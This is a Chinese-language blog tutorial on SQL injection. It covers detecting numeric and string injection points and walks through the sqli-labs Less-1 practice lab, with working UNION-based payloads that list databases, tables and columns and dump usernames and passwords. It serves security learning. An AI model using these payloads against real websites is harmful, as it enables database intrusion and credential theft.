【Day3】SQL注入与sqli-labs Less-1

最新推荐文章于 2023-08-06 12:04:33 发布
最新推荐文章于 2023-08-06 12:04:33 发布
阅读量349 收藏 2
点赞数 4
分类专栏: SQLI 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46436640/article/details/105351027
版权

本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!!

Day3

判断SQL注入类型

一.数字型(整型)注入

输入的参数为整数,如ID、年龄、页码等

我们假设一个网址的URL为

http://www.testweb.com/user.php?id=8

实际查询代码原型诸如:select…from…where id=$id…

数字型注入测试:

1.http://www.testweb.com/user.php?id=8’
(语句报错,说明未对单引号过滤)

2.http://www.testweb.com/user.php?id=8 and 1=1
运行正常(返回数据与原始请求无任何差异)

3.http://www.testweb.com/user.php?id=8 and 1=2
运行异常(不会报错)

以上三个步骤全部满足则证明可能为数字型注入

二.字符型注入

当输入的参数为字符串时,称作字符型,字符型注入最关键的是如何闭合SQL语句以及注释多余的代码

我们假设一个网址的URL为

http://www.testweb.com/user.php?username=‘admin’

字符型注入测试:

1.http://www.testweb.com/user.php?username=admin’

此时SQL语句变为:
select * from table where name=‘admin’’
(由于加了单引号后变成三个单引号,所以语句报错)

2.http://www.testweb.com/user.php?username=admin’ and ‘1’='1
此时SQL语句变为:
select * from table where name=‘admin’ and ‘1’=‘1’
(页面运行正常)

3.http://www.testweb.com/user.php?username=admin’ and ‘1’ ='2
此时SQL语句变为:
select * from table where name=‘admin’ and ‘1’ =‘2’
(语法正确,但是逻辑错误,返回正确)

以上三个步骤全部满足则证明可能为字符型注入

SQL注入

我们首先要了解一下什么是SQL注入,所谓SQL注入就是就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。-百度百科

SQL注入按照注入点一般分为三大类:数字型(整型)注入、字符型注入、搜索型注入

按照注入技术(执行效果)分为:基于布尔的盲注、基于时间的盲注、基于报错的注入、联合查询注入、堆查询注入

SQL手工注入过程

1.首先判断是否存在注入点

2.判断字段长度(order by)

3.判断字段的回显位置(就是到底是哪几个字段位置是有实际信息,其他都是空信息)

4.判断数据库信息(database()、version())

5.查找数据库名
常用函数:(一般用group_concat()函数,将字段的值打印在一行,逗号分隔)

常用语句:(select schema_name from information_schema.schemata)

6.查找数据库表 ()

常用函数同上

常用语句:(select table_name from information_schema.tables where table_schema=‘想要指定的数据库’)

7.查找数据库表中所有字段以及字段值

常用语句同上

常用函数: (select column_name from information_schema.columns where table_name=‘想要看的表名’)

(select uesrname,password from security.users)

8.猜解账号密码

常用函数:concat_ws(以xx分隔符分割(例如逗号、冒号、顿号),想要查看的内容)

用于连接字符串

9.登录管理员后台

通过SQL注入就可以获得user与password这样就可以登录后台的管理员系统啦!

sqli-labs

因为是第一次学,所以难免有讲的不好地方希望大家多多指正。

Less-1

GET - Error based - Single quotes - String

基于报错的GET单引号字符型注入

首先我们先根据提示输入id=1,网页显示正常
在这里插入图片描述
我们在后面加一个单引号,发现页面报错,说明网页未对单引号进行过滤,所以可能存在SQL注入
在这里插入图片描述
我们在后面输入’and ‘1’='1,发现界面仍然正常

在这里插入图片描述
我们在后面输入’and ‘1’='2,发现没报错,但是页面显示不正常(因为语法没有错误,但是逻辑判断不对,所以页面显示不正常),这就说明可能存在字符型注入。

在这里插入图片描述
字符型注入关键就是要闭合单引号,以及注释掉多余的语句,接下来我们就先判断字段长度也就是有几列

我们一个一个试它的字段长度(一般不会太长),此时为1显示正常在这里插入图片描述
然后知道试到4的时候发现页面报错了,代表这个数据库只有三个字段也就是三列
在这里插入图片描述
接下来我们判断字段的回显位置(用一个数据库没有的ID(一般是负数和比较大的整数)以及union联合查询),发现回显位置只有2和3。

在这里插入图片描述
知道回显位置了以后我们就可以查询关于数据库的一切了,比如数据库信息及版本信息(database()、version())
在这里插入图片描述
在这里插入图片描述
接下来我们爆破数据库名

?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

在这里插入图片描述
然后我们爆破数据security里面的数据表名(因为一般用户名及密码都是放在这个里面的)

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
在这里插入图片描述
然后最后就是爆破数据表user(用户名密码一般在这里)里的字段(列)了,发现了用户名和密码
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
在这里插入图片描述
最后就是直接爆破出用户名对应的密码

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+
在这里插入图片描述
或者用concat_ws函数()
?id=-1' union select 1,2,group_concat(concat_ws(':',username,password)) from users--+
在这里插入图片描述
这个只是部分截图(屏幕有限,不过和上面爆破出来的用户名密码一样)

从Less-1我们学到了:

查库:
select schema_name from information_schema.schemata;
查表:
select table_name from information_schema.tables where table_schema=‘security’;
查列:
select column_name from information_schema.columns where table_name=‘users’;
查字段:
select group concat(username) from users;
select group concat(password) from users;
select concat_ws(’:’,username,password) from users;

还学到了题目中的限制条件也是我们需要注释掉的

SELECT * FROM users WHERE id=‘1’ LIMIT 0,1

LIMIT N,M N:从第N+1个开始,例如N=1,那么相当于从第一个开始。

M:显示几行,例如总共有5行,此时M=1,那么只能显示一行。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述--------------------------分割线7/1-------------------------------
完成Less-1的所有语句如下

ID:1’ order by 3 –

ID:1’ order by 4 –

ID:-1’ union select 1,2,3 –

ID:-1’ union select 1,2,database() –

ID:-1’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ) –

ID:-1’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ ) –

ID:-1’ union select 1,username,password from users limit 0,1–
ID:-1’ union select 1,username,password from users limit 1,1–
ID:-1’ union select 1,username,password from users limit 2,1–
ID:-1’ union select 1,username,password from users limit 3,1–
ID:-1’ union select 1,username,password from users limit 4,1–
ID:-1’ union select 1,username,password from users limit 5,1–

以上语句的末尾都是两个减号,为SQL语句的注释

--------------------------分割线7/1-------------------------------

【本文为自己原创,难免有疏漏之处,如有错误,请私信指正】

丶Maple
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs 21——40关攻略
weixin_45880717的博客
02-02 1057
Less-21 基于错误的复杂的字符型Cookie注入 base64编码,单引号,报错型,cookie型注入。 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
Sqli-Labs学习sql注入Sqli-Labs less-1&2
vegetable_haker的博客
10-25 829
Sqli-Labs:Less-1 尝试传入参数 localhost/sqlilabs/Less-1/?id=1 localhost/sqlilabs/Less-1/?id=1' localhost/sqlilabs/Less-1/?id=1'' localhost/sqlilabs/Less-1/?id=1''' 在测试以上传参的时候发现第一和第三条的时候页面能正...
SQL注入sqli-labs学习(less-1)
Yy10205473的博客
10-17 2585
sqli-labs:less-1 sqli-labs靶场网址. 通过sqli-labs中的题目来学习sql注入 sql注入的基本步骤 (1)判断是否存在注入,判断类型并且闭合语句 (2)使用order by 关键字来判断字段数 (3)选择注入语句,使用union查询或者报错注入 (4)获取数据库用户,版本,当前连接的数据库等信息 (5)获取某个数据库表的信息,获取列信息 (6)获取表中的数据 手工注入 进入less-1页面,根据页面的英文提示,发现需要我们输入参数 在后面添加参数。 http://10.1
SQL注入(分类、原因、寻找注入)
小赵同学的博客
02-14 1327
目标: SQL注入 SQL注入分类 造成SQL注入的原因 寻找SQL注入 一、SQL注入 1、什么是SQL注入漏洞 攻击者利用web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库的入侵。 2、SQL注入原理 SQL注入攻击的本质,服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当作SQL语句执行,从而影响数据库安全和平台安全 3、注入的本质 对于输入检查不充分,导致SQL语句将用户提交的非
SQL注入漏洞(2)注入方法2 union联合注入
weixin_51339377的博客
03-18 1666
1.估算目标的数据库语法(可能性很多) select username,password from tablex where id=' 2\' limit 0,1 select username,password from tablex where id=2 limit 0,1 select username,password from tablex where id=(2) limit 0,1 2.黑客需要破坏数据库语句目的是为了知道数据库的闭合方式 一旦出现报错即破环成功 这个世界上...
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 938
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
SQL注入实操三(SQLilabs Less41-65)
wutiangui的博客
08-06 835
到目前为止,我总结了一下出现过的轮子,可以得出一个结论,首先需要知道有几个参数,前面6种都是单参数的,多参数的只能通过报错信息得知,用–+还是#也要看报错情况n可以是1,-1,n’后面可接),select后面看情况设置显示位② ')–+)可选,'可换成"③ ‘) --+()可换成)),(可换成((,‘可换成"④ " --+或’ #或’ --+⑨ ‘||1||’⑩ ‘#或‘–+⑫。
打穿sqli-labs靶场——Day6 (less-8)手工布尔盲注
qq_45741871的博客
04-18 468
打穿sqli-labs靶场day6——less-8 手工布尔盲注
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
史上最详细sql注入wp
热门推荐
lyy0xfff的博客
07-26 2万+
文章目录sql注入wp(史上最详细)前言什么是SQL注入SQL注入的原理常见的注入方式常见绕过技巧常见防控SQL注入的方法手工查询语句Basic ChallengesLess-1 **Error Based- String**Less-2 Error **Based- Integer**Less-3 Error Based- String (with Twist)Less-4 Error Based- DoubleQuotes String@@Less-5 Double Query- Single Quo
sql盲注脚本编写
lyy0xfff的博客
08-01 1016
因为下学期要学python,又因为自己的python和编程能力实在是太弱了,所以想来学学python脚本编写的应用,就以sqli-labs里面的布尔盲注、时间盲注作为例子,来一步一步学习编写脚本 Requests库 写脚本注入的时候,用的最多的库就是requests库了,顺便学习一下它8!它可以在python中发出一个标准的HTTP请求。可以基本完全满足HTTP测试需求 安装库 pip install requests 导入库 import requests 请求(Request) params: u
【超详解】sql盲注中的布尔类型(Less-8)、时间类型的盲注(Less-9)
lyy0xfff的博客
07-07 902
SQL注入之盲注基于布尔类型的盲注(Less-8)基于时间类型的盲注 基于布尔类型的盲注(Less-8) 首先布尔类型只有两种状态:Ture和False 盲注的意思就是我们在网页端并不能看到它的回显,只能根据逻辑来进行判断语句是否执行成功 会用到的SQL函数: length()用来获取字符串的长度 ASCII()用来获取字符串的ASCII码 substr(str,M,N)用来截取字符串 其中str为要截取的字符串、M为从第几个字符开始截取N为截多少个字符,例如substr(str,1,1)的意思就是从str
sql注入】Less5-7详解
lyy0xfff的博客
07-13 886
SQL注入Less-5Less-6Less-7 Less-5 0x00 首先根据题意我们输入参数id=1,和id=-1看看页面的回显情况 我们发现当它执行的SQL语句正确时,页面返回You are in,当sql语句执行不正确时,返回为空,且并没有回显位置,这就是我们所说的盲注,具体什么时盲注可以看我之前的文章基于布尔类型、时间类型的盲注 0x01 Less-6 Less-7 ...
【超详细】POST注入(Less-11)、Cookie注入(Less-20)、二次注入(Less-24)、宽字节注入(Less-32)
lyy0xfff的博客
07-09 488
需要知道的一些知识: 所谓POST注入指的是我们往常传递参数的时候,在地址栏都可以看到 我们输入参数的具体值,但POST方式提交的特点就是,所提交的数据 不会在地址栏上显示。 这就需要我们对传递过来的数据进行抓包,通过拦截从而来修改我们 提交的数据,起到POST注入的效果。 0x01 首先我们根据题意,输入一个用户名和密码,系统显示你的用户名和你的密码(蓝字,可能看不请), 并且提示你成功登录 0x02 然后我们看到它的SQL语句后面的where条件存在单引号,然后我们联想到单引号注入,所以我们试试对us
SQL注入靶场sqli-labs
最新发布
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值